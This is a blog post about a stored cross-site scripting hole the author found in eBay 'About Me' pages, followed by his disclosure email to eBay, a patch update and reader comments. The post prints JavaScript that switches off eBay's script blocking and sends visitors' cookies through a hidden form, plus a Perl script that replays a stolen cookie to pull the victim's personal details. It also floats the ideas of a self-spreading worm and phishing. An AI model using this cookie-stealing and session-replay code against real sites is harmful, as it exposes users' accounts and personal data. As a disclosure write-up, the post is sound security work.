eBay XSS

2012/07/05 filed under /web

Sometimes, when someone bugs you, you'll like to see how to bypass the bugging. I am not alone in this, take for example, BugMeNot

A few days ago, I had to figure out a way to put the right information at an eBay About Me page concerning an eBay store.

The easiest would be to redirect the user to the official website, yet eBay doesn't allow that kind of JavaScript to be put on there. A link could be put up, but that wouldn't be nice, for you'd force the user to click on it, before showing the real content. Blocking the JavaScript I "needed" was promising. How to bypass that? Soon I found out, but then I figured more was probably possible.

Time to refresh my knowledge and try a few things. An easy hack was to use this piece of code:


Now we could do a little more, the easy way. Including a JavaScript file would speed up the whole debugging of the site. Too bad, a lot of stuff would still be blocked, but that blocking was done by JavaScript itself! Time to disable the block. So in my evilness.js I would start with:

ebay.oDocument._getControl("blockActiveContent").aBlocks = Array();

Now the active block content would be an empty array, meaning, we can insert anything we like, like iframes, document.cookie and everything. Yay!

So, why not grab the user's cookies and put that in a form?

document.write('<form action="" ');
document.write('id="f" method="post"');
document.write('<input type="hidden" name="q" value="" id="q" />');

var q = document.getElementById('q').value = document.cookie;


Sweet, now the user will be submitting a form with his cookie contents to us. Let's see if we can use that information! (Of course we can, otherwise I wouldn't be blogging this ;-)


use strict;
use CGI qw/:standard/;
use LWP::Simple qw/$ua get/;

my $q = new CGI;

$ua->default_headers->push_header('Cookie' => $q->param('q'));

my $personal_info = get(''.

That's basically all it takes to retrieve the personal page of the user who just fell in our trap. Using his cookies, we'll be served with all his information (email address, street address, username etc). Of course we could make this into a worm, by putting the little javascript form into the victim's About Me page too.

I don't really care about all of this information, and for "the good stuff" such as passwords and credit card info, you'd still need the password of the user, but hey, we already have his full address (usually with full name), his email address and username, so a phising site is setup in seconds!

... I wonder how many people use the same password on eBay and PayPal ...

Note: all of this is created just for the fun of bypassing roadblocks, and I expect eBay to terminate your account immediately after finding stuff like this in you profile, so I do not advice you to use such tactics! Another thing is that your "victim" has to be logged in for this, but a lot of them will be.

Of course, I have contacted eBay on this exploit and wrote them the following:

Dear sirs,

Recently I noticed I was able to use JavaScript on my 'About Me' page, using a XSS tactic. This way, I was able to pass on cookies to a third party server (mine in this matter) and use those cookies from there to access information about the user account.

I have tested this setup as I describe here: http://url and it does work flawlessly. I could gather username, address, email info from my own account aswell as some friends' accounts (with their coorperation and permission). I also think I'd be able to make a worm out of this, infecting every visitor's 'About Me' page.

The solution, IMHO, is quite easy. Stop allowing JavaScript in the About Me page and actually filter it out before you store it in the databases.

I would like to hear from you regarding this privacy matter and will not post this blog entry (see URL above) as of yet, to prevent script kiddies from abusing it. I will post it on Monday, leaving you with enough time to contact me.

If you do need more time for patching the system, I'm willing to wait even longer before posting the info on my blog.

Kind Regards,

How nice of me. But unfortunately, I haven't head from eBay so far, except for scanning my system from a few different IP addresses. Now, according to eBay time it's monday now, so let's unleash this information!

I really thought eBay would care enough about your privacy, yet they don't even have the decency to email me ...

Update: After publication on WebWereld, eBay finally deemed it necessary to email me. They claim never to have received my initial email. Weird, cause my website logs show me that at least 4 different IP addresses have requested the "secret" URL I created for them. So I guess at least four people didn't receive my email ...

This hole is patched for now, yet a simple alert('Hello World') can still be posted, so JavaScript has not been disabled fully.

Posted by: B10m | permanent link | comments (3)


"dem npfdd seine Buchstabendeponie" mentioned this post in "XSS":

B10[m|g] hat kürzlich eine wunderschöne Anleitung für Cross Site Scripting auf eBay veröffentlicht. 2 Dinge, die ich dazu sagen möchte: erstens die Reaktionszeit von eBay ist bemerkenswert. Zweitens mySpace ist, verglichen mit eBay, schon eine Sicherheitslücke an sich. Dort werden individuelle Skripte etc. ausdrücklich erlaubt und auch intensiv genutzt. Think about it.


Dosvedanya wrote at 2006-10-02 09:28:

Nice! im a real noob in programming but i understand what you've done.

BOK wrote at 2006-10-03 10:36:

I got an account at eGay, but I've always been too chicken to use it. Now I remember once again why it's sometimes good to be chicken...
Nice one B10m, too bad it had to go to Webwereld first. I can't see WHY people have to be so ignorant at first. Oh wait, the USofA did the same in the early 2000's regarding Al-Qaida too, right? ;-)

B10m wrote at 2006-10-03 20:08:

To clarify: I have, nor have had, anything to do with Al-Qaida ;-) But yeah, it's a shame it had to go like this.

I can say though that an eBay representative did thank me for contacting them (and finding the hole). He told me he'd check the internal communication flow, for he kept claiming never to have received my initial email.

Comments are closed for this story.
Trackbacks are closed for this story.